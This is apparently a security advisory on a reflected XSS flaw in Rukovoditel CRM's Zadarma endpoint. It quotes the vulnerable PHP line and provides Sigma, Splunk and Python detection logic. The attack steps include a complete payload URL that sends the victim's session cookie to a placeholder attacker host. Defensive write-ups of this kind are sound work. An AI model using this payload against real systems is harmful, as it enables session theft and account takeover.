
CVE-2026-31845: Reflected XSS in Rukovoditel CRM

DFIR analysts are observing an increase in attack vectors targeting CRM applications. CVE-2026-31845 perfectly illustrates the danger of poorly managed Cross-Site Scripting (XSS) flaws on a telemetry endpoint. With a CVSS score of 9.3, this vulnerability allows an unauthenticated attacker to take control of a user session.

The vulnerability lies in the total absence of sanitization on the zd_echo parameter. The following source code is identified as the main vector:

if (isset($_GET['zd_echo'])) exit($_GET['zd_echo']);

This statement writes the raw content of zd_echo straight back into the response body and halts, so any JavaScript payload placed in the parameter is reflected to the browser without filtering or output encoding.

  1. Reconnaissance: The attacker identifies the /api/tel/zadarma.php endpoint.
  2. Payload Crafting: Creation of a malicious URL injecting a session theft script: http://crm.target.com/api/tel/zadarma.php?zd_echo=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
  3. Execution: The victim clicks the link, and the script executes in the context of the CRM’s active session.
  4. Exfiltration: The session cookie is sent to the attacker’s server.

Detection must focus on web server access logs to spot typical payload structures in the targeted parameter.

Sigma rule (field names as given in the source):

title: Rukovoditel CRM Zadarma API XSS Attempt
status: experimental
description: Detects exploitation attempts of CVE-2026-31845 against Rukovoditel CRM
logsource:
    product: web
    category: web_server
detection:
    selection:
        uri|contains: '/api/tel/zadarma.php'
        get_parameter_name: 'zd_echo'
        # any one marker is enough; '|contains|all' would require both strings
        # and miss the <script>-only payload shown above
        get_parameter_value|contains:
            - '<script'
            - 'javascript:'
    condition: selection

Equivalent Splunk search (URL-decodes the parameter before matching):

index=web_logs sourcetype=access_combined uri="/api/tel/zadarma.php" zd_echo="*"
| eval payload=urldecode(zd_echo)
| where match(payload, "(?i)<script") OR match(payload, "(?i)javascript:")
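As an added illustration of the detection logic above (not part of the original advisory or of the Rukovoditel project), the following Python scanner parses Apache combined-format access lines, isolates the zd_echo parameter and URL-decodes it repeatedly before matching, so a double-encoded payload that a single contains check on the raw value would miss is still flagged. The log lines, timestamps and IP addresses are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines (not real traffic): one benign echo,
# one URL-encoded payload, one double-encoded payload, one unrelated request.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2026:10:01:22 +0000] "GET /api/tel/zadarma.php?zd_echo=ping HTTP/1.1" 200 4 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2026:10:02:05 +0000] "GET /api/tel/zadarma.php?zd_echo=%3Cscript%3Etest%3C/script%3E HTTP/1.1" 200 33 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2026:10:02:41 +0000] "GET /api/tel/zadarma.php?zd_echo=%253CSCRIPT%253E HTTP/1.1" 200 8 "-" "curl/8.0"
198.51.100.4 - - [12/Mar/2026:10:03:10 +0000] "GET /index.php?module=dashboard HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Request-line fields we need from the combined format.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Same markers as the Sigma rule and Splunk search above, matched case-insensitively.
XSS_MARKERS = re.compile(r'<\s*script|javascript:', re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so a double-encoded payload is compared in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (ip, timestamp, decoded payload) for a suspicious zd_echo request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if parts.path != '/api/tel/zadarma.php':
        return None
    # parse_qs already removes one layer of encoding; decode_fully handles the rest.
    for raw in parse_qs(parts.query, keep_blank_values=True).get('zd_echo', []):
        payload = decode_fully(raw)
        if XSS_MARKERS.search(payload):
            return (m.group('ip'), m.group('ts'), payload)
    return None

def scan_log(text):
    """Scan every line; returns the list of hits in log order."""
    return [hit for hit in map(scan_line, text.splitlines()) if hit]

if __name__ == '__main__':
    for ip, ts, payload in scan_log(SAMPLE_LOG):
        print(f'{ts} {ip} zd_echo={payload!r}')
```

Feed real access logs through scan_log and pivot on the source IP and timestamp against authentication logs, as the next paragraph describes.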

Forensic analysis of logs will identify the entry point. It is crucial to monitor file modifications in /api/tel/ and suspicious access to external domains. Correlation with authentication logs may reveal successful account takeovers immediately following a detected XSS request.